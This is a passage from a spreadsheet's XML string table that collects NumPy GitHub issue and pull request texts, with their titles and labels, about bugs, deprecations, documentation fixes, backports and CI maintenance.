E           {message : DeprecationWarning('an integer is required (got type float).  Implicit conversion to integers using __int__ is deprecated, and may be removed in a future version of Python.'), category : 'DeprecationWarning', filename : '/home/travis/build/numpy/numpy/builds/venv/lib/python3.8/site-packages/numpy/core/tests/test_deprecations.py', lineno : 89, line : None}_x000D_
```_x000D_
I think this problem is on the Python end in the `timedelta` class. I note that the function on our end looks buggy also, assigning a long to an int. The function where this occurs is deprecated, but until it is removed we should fix it._x000D_
_x000D_
EDIT: we might just want to mark it `xfail(python &gt; 3.7)` if the problem really is on the Python end, in which case it should be fixed at some point. But let's wait until the first or second 3.8 rc before taking that step._x000D_
&lt;!--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import numpy as np_x000D_
&lt;&lt; your code here &gt;&gt;_x000D_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t>
  </si>
  <si>
    <t>Python 3.8b2 and TestDatetime64Timezone, too many warnings.</t>
  </si>
  <si>
    <t>['00 - Bug', '07 - Deprecation']</t>
  </si>
  <si>
    <t>Builds upon gh-14062 to use the output of `make dist` and update the numpy/doc documentation archive repo when on a tagged release. Will require rebase after gh-14062 is merged_x000D_
_x000D_
The idea is that, as part of the release process, we tag a repo checkout, build the docs, and commit that version of the documentation to the numpy/doc repo which is visible as https://numpy.org/doc. That means there is no delay between release and achive documentation availablility._x000D_
_x000D_
~Also needs numpy/numpy.org#25 to drive traffic from https://numpy.org to https:/numpy.org/doc~_x000D_
_x000D_
Edit: numpy.org PR was merged</t>
  </si>
  <si>
    <t>DOC: Doc release</t>
  </si>
  <si>
    <t>['04 - Documentation', 'component: build']</t>
  </si>
  <si>
    <t>Related to #11521 _x000D_
_x000D_
**Overview**_x000D_
Deprecates `full` and `economic` modes for the `linalg.qr`_x000D_
_x000D_
**Description**_x000D_
`full` mode is deprecated in favour of using `reduced` mode._x000D_
`economic` mode is deprecated completely.</t>
  </si>
  <si>
    <t>DEP: Deprecate full and economic modes for linalg.qr</t>
  </si>
  <si>
    <t>DOC:Add example to clarify "numpy.save" behavior on already open file #10445_x000D_
_x000D_
The docstring of [the](https://numpy.org/devdocs/reference/generated/numpy.save.html?highlight=save#numpy.save) `numpy.save` does not tell what will happen on overwriting the already written and unclosed file, and this might create confusion to the user or produce unwanted output._x000D_
So adding illustrative example to show the behavior of re-writing array to already open file _x000D_
Closes #10445</t>
  </si>
  <si>
    <t>DOC:Add example to clarify "numpy.save" behavior on already open file #10445</t>
  </si>
  <si>
    <t xml:space="preserve">xref #12991 _x000D_
_x000D_
We should emphasize the need to run tests as part of the documentation for [building numpy from source](https://www.numpy.org/doc/1.17/user/building.html) and in the developer setup [build page](https://www.numpy.org/doc/1.17/dev/development_environment.html#building-in-place). At the same time, the second page should defer to the first as it has more complete instructions. </t>
  </si>
  <si>
    <t>DOC: Emphasize the need to run tests when building from source</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes #14003_x000D_
_x000D_
* require OpenBLAS `0.3.7.dev` in ARMv8_x000D_
and POWER8 CI runs to match ecosystem / wheels_x000D_
_x000D_
Have to use slightly older versions of gcc toolchain to build these OpenBLAS binaries for the usual reason. The links to the build scripts used are already present in the docs visible in the diff._x000D_
</t>
  </si>
  <si>
    <t>MAINT: bump ARMv8 / POWER8 OpenBLAS in CI</t>
  </si>
  <si>
    <t xml:space="preserve">Related to #13114 </t>
  </si>
  <si>
    <t>DOC: Resolve bad references in Sphinx warnings</t>
  </si>
  <si>
    <t>xref #13990 _x000D_
_x000D_
- Add "." missing from #14028_x000D_
- Documentation build: `make dist` had to be called twice to succeed. Fixed by using `latex-build` and  `html-build` targets that avoid `version-check`, and use them in the `dist` target. See below for more info_x000D_
_x000D_
&lt;details&gt;_x000D_
_x000D_
`$NUMPYVER` was evaluated globally when Makefile was first read. On a clean build, before numpy is built and installed, the variable would be empty. The `dist` target would call the `dist-build` target, which would install numpy, then the `html` target which checks `version-check` and uses the stale value for `$NUMPYVER`. Upon a second call to `make dist`, `$NUMPYVER` would evaluate to the version of numpy produced in the previous call. _x000D_
_x000D_
Rather than mess with getting the stale value updated, it is easier to avoid the check altogether when calling `make dist`</t>
  </si>
  <si>
    <t>DOC, BUILD: cleanups and fix (again) 'make dist'</t>
  </si>
  <si>
    <t>```python_x000D_
In [1]: import numpy as np_x000D_
_x000D_
In [2]: a = np.random.randn(4, 4)_x000D_
_x000D_
In [3]: np.pad(a, 0, 'maximum', stat_length=0)_x000D_
---------------------------------------------------------------------------_x000D_
ValueError                                Traceback (most recent call last)_x000D_
&lt;ipython-input-3-9b3a3094eda5&gt; in &lt;module&gt;_x000D_
----&gt; 1 np.pad(a, 0, 'maximum', stat_length=0)_x000D_
_x000D_
&lt;__array_function__ internals&gt; in pad(*args, **kwargs)_x000D_
_x000D_
~/Envs/dask-dev/lib/python3.7/site-packages/numpy/lib/arraypad.py in pad(array, pad_width, mode, **kwargs)_x000D_
    889         for axis, width_pair, length_pair in zip(axes, pad_width, length):_x000D_
    890             roi = _view_roi(padded, original_area_slice, axis)_x000D_
--&gt; 891             stat_pair = _get_stats(roi, axis, width_pair, length_pair, func)_x000D_
    892             _set_pad_area(roi, axis, width_pair, stat_pair)_x000D_
    893_x000D_
_x000D_
~/Envs/dask-dev/lib/python3.7/site-packages/numpy/lib/arraypad.py in _get_stats(padded, axis, width_pair, length_pair, stat_func)_x000D_
    328         slice(left_index, left_index + left_length), axis)_x000D_
    329     left_chunk = padded[left_slice]_x000D_
--&gt; 330     left_stat = stat_func(left_chunk, axis=axis, keepdims=True)_x000D_
    331     _round_if_needed(left_stat, padded.dtype)_x000D_
    332_x000D_
_x000D_
&lt;__array_function__ internals&gt; in amax(*args, **kwargs)_x000D_
_x000D_
~/Envs/dask-dev/lib/python3.7/site-packages/numpy/core/fromnumeric.py in amax(a, axis, out, keepdims, initial, where)_x000D_
   2623     """_x000D_
   2624     return _wrapreduction(a, np.maximum, 'max', axis, None, out,_x000D_
-&gt; 2625                           keepdims=keepdims, initial=initial, where=where)_x000D_
   2626_x000D_
   2627_x000D_
_x000D_
~/Envs/dask-dev/lib/python3.7/site-packages/numpy/core/fromnumeric.py in _wrapreduction(obj, ufunc, method, axis, dtype, out, **kwargs)_x000D_
     88                 return reduction(axis=axis, out=out, **passkwargs)_x000D_
     89_x000D_
---&gt; 90     return ufunc.reduce(obj, axis, dtype, out, **passkwargs)_x000D_
     91_x000D_
     92_x000D_
_x000D_
ValueError: zero-size array to reduction operation maximum which has no identity_x000D_
_x000D_
In [4]: np.__version___x000D_
Out[4]: '1.18.0.dev0+ea965e4'_x000D_
```_x000D_
_x000D_
WIth 1.16.4_x000D_
_x000D_
```python_x000D_
In [1]: import numpy as np_x000D_
a =_x000D_
In [2]: a = np.random.randn(4, 4)_x000D_
_x000D_
In [3]: np.pad(a, 0, 'maximum', stat_length=0)_x000D_
Out[3]:_x000D_
array([[-0.04438463, -1.55649773, -0.15239247,  0.21603728],_x000D_
       [ 0.20094814,  0.63132585, -0.72336271,  1.61631797],_x000D_
       [-2.3141824 ,  0.52565041, -0.19744238, -0.15078461],_x000D_
       [-0.36529822,  0.71162175, -1.56959988, -0.12497462]])_x000D_
```</t>
  </si>
  <si>
    <t>np.pad array with stat_length=0 fails on 1.17RC with ValueError</t>
  </si>
  <si>
    <t>['54 - Needs decision', '57 - Close?']</t>
  </si>
  <si>
    <t>2nd chunk is the most important_x000D_
_x000D_
code_generators/cversions.py =&gt; numpy/core/cversions.py_x000D_
_x000D_
1st and 3rd chunk are attempts to improve readability</t>
  </si>
  <si>
    <t>DOC: Update cversions.py links and wording</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #13979 ._x000D_
_x000D_
Closes #13844_x000D_
_x000D_
This PR adds a new document illustrating a very simple custom array container implementing `__array_ufunc__` and `__array_function__`. It also rephrases the documentation on subclasses to direct users toward considering dispatch instead of inheritance._x000D_
_x000D_
Additional work is needed to restructure the documentation to make this new document easier for developers to discover and to provide more context about when to choose inheritance (rarely but sometimes still the right choice) or dispatch. I propose to defer that larger effort to a separate PR and get this published soon so that _some_ high-level documentation on `__array_function__` is at least available._x000D_
_x000D_
Feel free to take a heavy hand to this in reviewing/editing. I wrote this with the perspective of someone who has been following the `__array_function__` conversation but has not thought deeply about the design._x000D_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</si>
  <si>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['04 - Documentation', '08 - Backport', 'component: Documentation']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #13855 ._x000D_
_x000D_
Fixes gh-13853._x000D_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</si>
  <si>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memory leak in dtype from dict contructor</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #13725 _x000D_
_x000D_
_x000D_
There are no macros `PyTuple_GET_SIZE` and `PyTuple_GET_ITEM` available when compiling with enabled `Py_LIMITED_API`._x000D_
_x000D_
Breaking change has been made in PR #10860. Before the change these macros had been used only in `NPY_TITLE_KEY` macro and had not been compiled not used. After the change they have been moved to a function and now are always visible to compiler. Other projects using numpy C-API can not be compiled with `Py_LIMITED_API` macro enabled because of this problem._x000D_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</si>
  <si>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compilation of 3rd party modules with Py_LIMITED_API enabled</t>
  </si>
  <si>
    <t>['00 - Bug', '08 - Backport', '30 - API']</t>
  </si>
  <si>
    <t>xref #13908 _x000D_
_x000D_
Add a pyproject.toml file. Needed for towncrier. _x000D_
_x000D_
This has already hit the mailing list, and met with hesitant approval since it causes `pip install .` to do an "isolated build" which may download a new cython, lengthening the build._x000D_
_x000D_
SciPy has added a pyproject.toml, and it doesn't seem to have caused too much pain.</t>
  </si>
  <si>
    <t>ENH: add pyproject.toml</t>
  </si>
  <si>
    <t xml:space="preserve">The contextlib.suppress context manager is not available in Python 2.7._x000D_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</si>
  <si>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Replace contextlib.suppress for Python 2.7</t>
  </si>
  <si>
    <t>#### Numpy/Python version information:_x000D_
Numpy version 1.18.0.dev0+101a8a6_x000D_
```python_x000D_
import numpy as np_x000D_
&gt;&gt;&gt; np.exp(np.float32(-103.00))_x000D_
0.0_x000D_
```_x000D_
Expected output from NumPy 1.16.2: _x000D_
```python_x000D_
import numpy as np_x000D_
&gt;&gt;&gt; np.exp(np.float32(-103.00))_x000D_
1e-45_x000D_
```</t>
  </si>
  <si>
    <t xml:space="preserve">BUG: float32 exp does not output denormals </t>
  </si>
  <si>
    <t xml:space="preserve">Somehow I find [this](https://drive.google.com/open?id=1jZHjnOyAxK--4TD0bgppKtFGtfiNn0N8) magic matrix that fails the `np.linalg.matrix_rank` function._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
_x000D_
data = np.load('tmp.npy')_x000D_
_x000D_
data.shape # (810000, 9)_x000D_
_x000D_
np.linalg.matrix_rank(data) # 7_x000D_
_x000D_
np.linalg.matrix_rank(data[190:300]) # 9_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
1.16.2 3.6.1 |Anaconda custom (64-bit)| (default, May 11 2017, 13:09:58) _x000D_
[GCC 4.4.7 20120313 (Red Hat 4.4.7-1)]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Bug report in np.linalg.matrix_rank</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #13813 ._x000D_
_x000D_
Now with tests...._x000D_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</si>
  <si>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further fixup to histogram2d dispatcher.</t>
  </si>
  <si>
    <t>['00 - Bug', '08 - Backport', 'component: __array_function__']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #13757 ._x000D_
_x000D_
Fixes GH-13728_x000D_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</si>
  <si>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fix histogram*d dispatchers</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #13648 ._x000D_
_x000D_
Allow unsafe casting from a simple data type to a structured one with_x000D_
multiple fields, but only from structured data type with a single_x000D_
field (checked recursively) to a simple data type._x000D_
_x000D_
For now, continue to allow any structured to structured with_x000D_
casting="unsafe", as the current can_cast implementation does not_x000D_
match that of "astype"._x000D_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</si>
  <si>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ensure that casting to/from structured is properly checked.</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #13590 ._x000D_
_x000D_
When I build numpy 1.16.3 with `clang version 7.0.0 (tags/RELEASE_700/final)` and `-fsanitize=undefined`, I got 2 runtime error:_x000D_
1. `numpy/core/src/multiarray/dragon4.c:877:36: runtime error: left shift of 1 by 31 places cannot be represented in type 'int'`_x000D_
2. `numpy/core/src/umath/reduction.c:57:19: runtime error: null pointer passed as argument 2, which is declared to never be null`_x000D_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</si>
  <si>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Fixes for Undefined Behavior Sanitizer (UBSan) errors.</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #13507 ._x000D_
_x000D_
This commit changes PyMemoryView_FromObject call sites to only_x000D_
clear BufferError and TypeError. Any other error will be raised_x000D_
to the caller of np.array._x000D_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</si>
  <si>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np.array cleared errors occured in PyMemoryView_FromObject</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #14002 ._x000D_
_x000D_
* add a function to tools/openblas_support.py_x000D_
that may be used to test OpenBLAS version_x000D_
available through NumPy in a manner agnostic_x000D_
to any specific CI service_x000D_
_x000D_
* expand OpenBLAS version checking to include_x000D_
ppc64le and POWER8 CI runs; a separate PR will_x000D_
be provided to bump these versions to 0.3.7.dev_x000D_
_x000D_
* OpenBLAS install was broken on ppc64le_x000D_
Travis CI after migration to tools/openblas_support.py;_x000D_
fixed that_x000D_
_x000D_
* Azure CI config no longer uses a single-line_x000D_
280-character Python "program" assigned to an_x000D_
environment variable to check OpenBLAS version;_x000D_
instead, it now leverages tools/openblas_support.py_x000D_
to perform the same operation using a conventional_x000D_
Python function_x000D_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</si>
  <si>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TST, MAINT: expand OpenBLAS version checking</t>
  </si>
  <si>
    <t>['00 - Bug', '03 - Maintenance', '05 - Testing', '08 - Backport', 'component: CI']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #14028._x000D_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</si>
  <si>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Improve quickstart documentation of new random Generator.</t>
  </si>
  <si>
    <t>['03 - Maintenance', '04 - Documentation', '08 - Backport', 'component: Documentation']</t>
  </si>
  <si>
    <t xml:space="preserve">references #7059_x000D_
xref https://github.com/numpy/numpy/issues/11521_x000D_
@mattip  I am still not sure if removing the function is the best choice. We could go ahead if you agree or we could also remove the warning and deprecated note entirely as you suggested_x000D_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</si>
  <si>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DEP: Remove np.rank which has been deprecated for more than 5 years</t>
  </si>
  <si>
    <t>['07 - Deprecation', '56 - Needs Release Note.']</t>
  </si>
  <si>
    <t>DEP: Raise warnings for deprecated functions PyArray_As1D, PyArray_As2D</t>
  </si>
  <si>
    <t>This very small PR updates the documentation of [numpy.allclose](https://docs.scipy.org/doc/numpy/reference/generated/numpy.allclose.html) regarding NaNs._x000D_
_x000D_
Currently:_x000D_
_x000D_
&gt; If either array contains one or more NaNs, False is returned._x000D_
_x000D_
However it is not true if `equal_nan=True`. This is replaced with:_x000D_
_x000D_
&gt; NaNs are treated as equal if they are in the same place and if `equal_nan=True`.</t>
  </si>
  <si>
    <t>DOC: Fix docstring of numpy.allclose regarding NaNs</t>
  </si>
  <si>
    <t xml:space="preserve">I'll send an email to the mailing list to discuss._x000D_
_x000D_
Cc @joelachance, @Shekharrajak _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>NEP: numpy.org website redesign</t>
  </si>
  <si>
    <t xml:space="preserve">When a buffer interface does not request a writeable buffer,_x000D_
simply pass a read-only one when the warn on write flag is set._x000D_
_x000D_
This is to give an easier way forward with avoiding the deprecation_x000D_
warnings: Simply do not ask for a writeable buffer._x000D_
_x000D_
It will break code that expects writeable buffers but does not_x000D_
ask for them specifically a bit harder than would be nice._x000D_
But since such code probably should ask for it specifically, this_x000D_
is likely fine (an RC release has to find out)._x000D_
_x000D_
The main reason for this is, that this way it plays very will with_x000D_
cython, which requests writeable buffers explicitly and if declared_x000D_
`const` is happy about read-only (so that using `const` is the best_x000D_
way to avoid the warning and makes code cleaner)._x000D_
_x000D_
Closes gh-13929, gh-13974_x000D_
</t>
  </si>
  <si>
    <t>['00 - Bug', '07 - Deprecation', 'component: numpy.core']</t>
  </si>
  <si>
    <t xml:space="preserve">The [reference document](http://www.numpy.org/devdocs/reference/random/index.html?highlight=random#module-numpy.random) on numpy.random stated in the opening sentence of the quick start section_x000D_
_x000D_
&gt; By default, `~Generator` uses normals provided by `~pcg64.PCG64` which will be	By default, `~Generator` uses sequences provided by `~pcg64.PCG64` which will be statistically more reliable than the legacy methods in `~.RandomState`_x000D_
_x000D_
which is misleading, as `PCG64` does not provide routine to generate normals. _x000D_
_x000D_
So I assume it meant "uses sequences provided by PCG64" instead. _x000D_
_x000D_
While at the topic, I would like to also suggest to reword "statistically more reliable" into more specific "of better statistical quality". _x000D_
_x000D_
If no objection arise to the latter change, I will push a commit. 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_x000D_
@mattip @bashtage </t>
  </si>
  <si>
    <t>DOC: Improve quickstart documentation of new random Generator</t>
  </si>
  <si>
    <t>Still draft, need to discuss a few things like how we do contacting us outside the mailing list or GitHub.</t>
  </si>
  <si>
    <t>DOC: update "Contributing to NumPy" with more activities/roles</t>
  </si>
  <si>
    <t>['01 - Enhancement', '04 - Documentation']</t>
  </si>
  <si>
    <t xml:space="preserve">I believe that we pretty much decided on this and @njsmith wished_x000D_
to not be the NumFOCUS liason, so this suggests to replace me and him_x000D_
for the subcommittee as well. This is up for discussion, if anyone_x000D_
else is interested I would be happy to exchange it and if Nathaniel_x000D_
wants to remain on the subcommittee we can go another route._x000D_
_x000D_
---_x000D_
_x000D_
@rgommers can you pass on my contact information to NumFOCUS? I assume it is unlikely that we go a different route (and we can easily ask them to change it again). Lets keep this open for a few days to give everyone time to discuss here or elsewhere._x000D_
</t>
  </si>
  <si>
    <t>DOC: Update NumFOCUS subcommittee replacing Nathaniel with Sebastian</t>
  </si>
  <si>
    <t>['15 - Discussion']</t>
  </si>
  <si>
    <t xml:space="preserve">Made references to each other for the following two indexing docs_x000D_
_x000D_
    https://docs.scipy.org/doc/numpy-1.15.0/user/basics.indexing.html_x000D_
    https://docs.scipy.org/doc/numpy-1.13.0/reference/arrays.indexing.html_x000D_
_x000D_
closes #12195_x000D_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</si>
  <si>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DOC:Link between the two indexing documentation pages</t>
  </si>
  <si>
    <t>This is a feature request and the proposal only show differences when the dimension of matrix is very large. Specifically, this proposal is useful only when one wants to solve full eigenvalue problems on a matrix as large as possible on given hardwares. _x000D_
_x000D_
Say `m` is a very large real symmetric matrix, to get the full eigen spectrum, we can use `np.linalg.eigvalsh(m)`. The underlying Lapack routine is `dsyevd('N',...)` which requires only O(N) extra work space besides the matrix itself (N^2) with the cost that the matrix `m` is changed after eigenvalue problem solving. Namely, the original matrix is not kept in the routine. The total memory requirement is $8(N^2+2N)$ for real (double) symmetric matrix `m` with size N*N. In the implementation of numpy, it is definitely necessary to keep `m` when calling `eigvalsh(m)` by default, and therefore the memory requirement on the same problem is at least $8(2N^2+2N)$ due to a copy of original matrix._x000D_
_x000D_
It would be better that there are some interfaces in numpy that can directly do `dsyevd` without copy `m`. Namely, `m` should be some rubbish after calling `eigvalsh_mem(m)`, only return values from this function make sense. The gain is that now we can solve eigenvalue problems with memory of order N^2 instead of 2N^2 in python; we have save half of the memory as well as the time to copy large matrix `m`. I believe other eigen and svd decom wrappers follow the same arguments. Note, lapack wrappers in scipy doesn't solve this issue, since their interface also keeps the original matrix. _x000D_
_x000D_
Of course, all these discussions are only relevant after the fix of https://github.com/numpy/numpy/issues/13956. Otherwise, the limitation of possible matrix size is not from hardwares but from 32bit int parameters for `lwork`._x000D_
_x000D_
One may argue that such new interfaces which destroy input array are counterintuitive and not pythonic at all, and I admit this.</t>
  </si>
  <si>
    <t>Feature request: memory efficient interface for eigh and similar eigensolvers</t>
  </si>
  <si>
    <t>Removes redundant/unreachable `break` from `get_cblas_libs`._x000D_
_x000D_
The `libs` is returned beforehand, so `break` is not needed._x000D_
_x000D_
Found with LGTM: https://lgtm.com/projects/g/numpy/numpy/snapshot/3acf5e0d956ec72b5cebe43b281e0bac095e7db3/files/numpy/distutils/system_info.py?sort=name&amp;dir=ASC&amp;mode=heatmap_x000D_
_x000D_
EDIT: Oh there is LGTM analysis already, nice ;).</t>
  </si>
  <si>
    <t>Update system_info.py</t>
  </si>
  <si>
    <t xml:space="preserve">- Update mailmap._x000D_
- Update changelog._x000D_
_x000D_
[ci skip]_x000D_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</si>
  <si>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Prepare 1.17.0rc2 release.</t>
  </si>
  <si>
    <t>['04 - Documentation', '14 - Release']</t>
  </si>
  <si>
    <t>Alternative to #13986 _x000D_
_x000D_
Remove our vendored version of tempita in favor of the one shipped with cython._x000D_
Scipy faces the same problem but will try to import it as an installed package as well if the cython one is unavailable, see below. I would prefer to go in the direction of removing `cythonize.py` altogether since cython provides this capability._x000D_
_x000D_
&lt;details&gt;_x000D_
_x000D_
```_x000D_
    try:_x000D_
        try:_x000D_
            from Cython import Tempita as tempita_x000D_
        except ImportError:_x000D_
            import tempita_x000D_
    except ImportError:_x000D_
        raise Exception('Building SciPy requires Tempita: '_x000D_
                        'pip install --user Tempita')_x000D_
```</t>
  </si>
  <si>
    <t>BUILD: use cython's tempita, remove the vendored version</t>
  </si>
  <si>
    <t>DOC: Array API : Directory restructure and code cleanup</t>
  </si>
  <si>
    <t xml:space="preserve">Before:_x000D_
_x000D_
```_x000D_
&gt;&gt;&gt; o = object()_x000D_
&gt;&gt;&gt; %timeit np.isscalar(42.0)_x000D_
249 ns ± 0.424 ns per loop (mean ± std. dev. of 7 runs, 1000000 loops each)_x000D_
&gt;&gt;&gt; %timeit np.isscalar([])_x000D_
1.45 µs ± 23.2 ns per loop (mean ± std. dev. of 7 runs, 1000000 loops each)_x000D_
&gt;&gt;&gt; %timeit np.isscalar(o)_x000D_
1.5 µs ± 36.3 ns per loop (mean ± std. dev. of 7 runs, 1000000 loops each)_x000D_
```_x000D_
_x000D_
After:_x000D_
_x000D_
```_x000D_
&gt;&gt;&gt; %timeit np.isscalar(42.0)_x000D_
153 ns ± 0.371 ns per loop (mean ± std. dev. of 7 runs, 10000000 loops each)_x000D_
&gt;&gt;&gt; %timeit np.isscalar([])_x000D_
1.13 µs ± 11.1 ns per loop (mean ± std. dev. of 7 runs, 1000000 loops each)_x000D_
&gt;&gt;&gt; %timeit np.isscalar(o)_x000D_
1.15 µs ± 1.59 ns per loop (mean ± std. dev. of 7 runs, 1000000 loops each)_x000D_
```_x000D_
_x000D_
The speedup comes from changing np.core.numerictypes.ScalarType to be a set,_x000D_
and reordering the checks inside isscalar: set lookup is faster than_x000D_
an isinstance check._x000D_
</t>
  </si>
  <si>
    <t>MAINT: Improve performance of isscalar</t>
  </si>
  <si>
    <t>&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
When I used the np.mod() and np.modf() to get the fractional part of a numpy array, I got an incorrect output 1._x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
&lt;&lt; your code here &gt;&gt;_x000D_
t = np.arange(200) / 1.25e6_x000D_
print(np.mod(t * 1.5e6, 1)[173:180])_x000D_
#result: [0.6, 0.8, 1., 0.2, 0.4, 0.6, 0.8]_x000D_
print(np.modf(t * 1.5e6)[0][173:180])_x000D_
#result: [0.6, 0.8, 1., 0.2, 0.4, 0.6, 0.8]_x000D_
```_x000D_
The result showed the 175th term of the numpy array has a fractional part of 1._x000D_
_x000D_
Though I could overcome this problem for my case by dropping the 1e6 by manual._x000D_
```python_x000D_
import numpy as np_x000D_
&lt;&lt; your code here &gt;&gt;_x000D_
t = np.arange(200) / 1.25_x000D_
print(np.mod(t * 1.5, 1)[173:180])_x000D_
#result: [0.6, 0.8, 0., 0.2, 0.4, 0.6, 0.8]_x000D_
print(np.modf(t * 1.5)[0][173:180])_x000D_
#result: [0.6, 0.8, 0., 0.2, 0.4, 0.6, 0.8]_x000D_
```_x000D_
It implied the precision may play a key role for the similar situations.</t>
  </si>
  <si>
    <t>BUG: np.mod() and fractional part of np.modf() give the output 1</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- np.matrix doesnt return any array when ()-brackets are used--&gt;_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
&lt;&lt;  a=np.matrix(1,2,3) &gt;&gt;_x000D_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Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
  File "/usr/local/lib/python3.7/site-packages/numpy/matrixlib/defmatrix.py", line 147, in __new___x000D_
    arr = N.array(data, dtype=dtype, copy=copy)_x000D_
TypeError: data type not understood_x000D_
--&gt;_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
</t>
  </si>
  <si>
    <t>np.matrix doesn't return a matrix wit full brackets</t>
  </si>
  <si>
    <t>This commit fixes the spelling of the ``delimeter`` kwarg to_x000D_
``delimiter`` (note the second e -&gt; i) in the npy_tempita module. This_x000D_
_x000D_
npy_tempita vendorises Tempita a minimal templating language._x000D_
The spelling has been fixed in the official documentation [1] and source_x000D_
code [2]. This commit fixes that fix by aligning npy_tempita with the_x000D_
reference documentation._x000D_
_x000D_
Although the vendored version is used in NumPy the delimeter kwarg is_x000D_
not. This raised the consideration of reverting to either the original_x000D_
version or Cython's non-vendored version [3]. Both were decided against_x000D_
because:_x000D_
_x000D_
1. The original is not actively maintained and required some fixes._x000D_
2. Cython's Tempita is an internal Cython tool and Cython may not_x000D_
guarantee that it will be present._x000D_
_x000D_
[1] https://pyrocore.readthedocs.io/en/latest/tempita.html_x000D_
[2] https://bitbucket.org/ianb/tempita/src/default/tempita/__init__.py_x000D_
[3] https://github.com/cython/cython/blob/master/Cython/Tempita/_tempita.py</t>
  </si>
  <si>
    <t>MAINT: Fix spelling error in npy_tempita  kwarg</t>
  </si>
  <si>
    <t>This was discussed in gh-14000, and slightly improves the situation_x000D_
at least maybe to the extend of understanding why it happens when_x000D_
looking more closely._x000D_
_x000D_
---_x000D_
_x000D_
The new output is:_x000D_
```python_x000D_
In [1]: class A():_x000D_
   ...:     def __len__(self):_x000D_
   ...:         raise ValueError("asdf")_x000D_
   ...:     def __getitem__(self, i):_x000D_
   ...:         return i_x000D_
   ...:     _x000D_
_x000D_
In [2]: np.array(A(), np.float64)_x000D_
---------------------------------------------------------------------------_x000D_
TypeError                                 Traceback (most recent call last)_x000D_
TypeError: float() argument must be a string or a number, not 'A'_x000D_
_x000D_
The above exception was the direct cause of the following exception:_x000D_
_x000D_
ValueError                                Traceback (most recent call last)_x000D_
&lt;ipython-input-2-1a34cbb915be&gt; in &lt;module&gt;()_x000D_
----&gt; 1 np.array(A(), np.float64)_x000D_
_x000D_
ValueError: setting an array element with a sequence._x000D_
```</t>
  </si>
  <si>
    <t>ENH: Chain exception for typed item assignment</t>
  </si>
  <si>
    <t>Mostly a reminder to myself to rebuild and generate new link for OpenBLAS binaries on gcc compile farm ppc64le and ARMv8 architectures -- as noted in #14002, currently using `0.3.5` instead of `0.3.7.dev` on those platforms vs. more conventional platforms in our CI.</t>
  </si>
  <si>
    <t>MAINT, TST: bump OpenBLAS for exotic archs</t>
  </si>
  <si>
    <t>* add a function to `tools/openblas_support.py`_x000D_
that may be used to test OpenBLAS version_x000D_
available through NumPy in a manner agnostic_x000D_
to any specific CI service_x000D_
_x000D_
* expand OpenBLAS version checking to include_x000D_
ppc64le and POWER8 CI runs; a separate PR will_x000D_
be provided to bump these versions to `0.3.7.dev`_x000D_
to match wheels / other CI_x000D_
_x000D_
* OpenBLAS install was broken on master ppc64le_x000D_
Travis CI after migration to `tools/openblas_support.py`;_x000D_
see logs--fixed that here_x000D_
_x000D_
* Azure CI config no longer uses a single-line_x000D_
280-character Python "program" assigned to an_x000D_
environment variable to check OpenBLAS version;_x000D_
instead, it now leverages tools/openblas_support.py_x000D_
to perform the same operation using a conventional_x000D_
Python function</t>
  </si>
  <si>
    <t>TST, MAINT, BUG: expand OpenBLAS version checking</t>
  </si>
  <si>
    <t>['00 - Bug', '03 - Maintenance', '05 - Testing', 'component: CI']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #13985 ._x000D_
_x000D_
Continuation of #13945_x000D_
_x000D_
Document a workaround for using code to span pre-1.17 versions_x000D_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</si>
  <si>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DOC: Show workaround for Generator.integers backward compatibility</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #13989 ._x000D_
_x000D_
`warning` module was used but not imported in `numpy.polynomials.polyutils`. Tests were not catching this bug._x000D_
- Increase test coverage to trigger and check the RankWarning (including check of error message)_x000D_
- Add missing import statement_x000D_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</si>
  <si>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Missing warnings import in polyutils.</t>
  </si>
  <si>
    <t>['00 - Bug', '08 - Backport', 'component: numpy.polynomial']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #13916 ._x000D_
_x000D_
For array likes supporting UFuncs, `np.abs` would return an array-like,_x000D_
and this is currently not compatible with the use of `np.piecewise`._x000D_
The simplest fix seems to be to just call asanyarray (which piecewise_x000D_
calls anyway on the array) beforehand. This way we ensure the conditions_x000D_
are also an array._x000D_
_x000D_
Fixes gh-13894_x000D_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</si>
  <si>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i0 Bessel function regression on array-likes supporting ufuncs</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #13907 ._x000D_
_x000D_
I've taken a go at a fix for #13902:_x000D_
 * Explicit check for negative type value in PyArray_DescrFromType_x000D_
 * PyArray_DescrConverter casts to unsigned char to match python bytes_x000D_
 * Add some tests_x000D_
_x000D_
Please tweak as you see fit :D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</si>
  <si>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Handle weird bytestrings in dtype()</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #13901 ._x000D_
_x000D_
_x000D_
Ubuntu 14.04 LTS (Trusty) provided a long term support distribution of_x000D_
Ubuntu with a 5 year support window. This window ended in April 2019_x000D_
